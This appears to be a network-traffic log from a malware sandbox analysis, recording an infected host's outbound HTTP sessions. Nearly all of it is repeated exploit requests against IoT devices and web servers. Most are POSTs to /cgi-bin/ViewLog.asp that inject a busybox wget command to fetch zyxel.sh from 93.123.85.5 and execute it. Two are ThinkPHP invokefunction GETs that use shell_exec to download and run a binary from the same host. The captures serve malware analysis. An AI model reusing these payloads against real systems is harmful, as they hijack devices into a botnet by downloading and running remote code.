                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.809583902 CET18867OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              31192.168.2.233793231.136.252.1868080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:12.523417950 CET1648OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:13.523750067 CET1764OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:15.507463932 CET1987OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:19.474980116 CET2463OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:27.409949064 CET3459OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:43.288938046 CET5392OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:16.043538094 CET9443OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              310192.168.2.235722631.41.165.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.139306068 CET6966OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.483673096 CET6975INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              311192.168.2.234122431.136.143.2288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.437884092 CET6971OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:57.422017097 CET7090OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:59.405817986 CET7326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:03.501326084 CET7817OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.436182976 CET8854OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:27.306220055 CET10749OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:59.045923948 CET14756OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              312192.168.2.234267231.136.234.2048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.438792944 CET6972OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:57.454026937 CET7091OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:59.437812090 CET7327OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:03.501301050 CET7817OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.436182976 CET8855OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:27.306210995 CET10749OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:59.045933008 CET14756OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              313192.168.2.233602094.60.172.818080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.447298050 CET6972OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.814758062 CET7038INHTTP/1.1 403 Forbidden


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              314192.168.2.234984885.192.5.1958080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.449184895 CET6973OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              315192.168.2.235758894.120.14.1708080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.452811956 CET6974OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              316192.168.2.2334380112.165.104.5280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:57.265181065 CET7087OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:57.568311930 CET7093INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Mon, 13 Nov 2023 21:18:57 GMT
                                                              Server: lighttpd/1.4.33
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              317192.168.2.2335896112.125.157.7580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:57.276822090 CET7088OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:57.591689110 CET7094INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:15:12 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
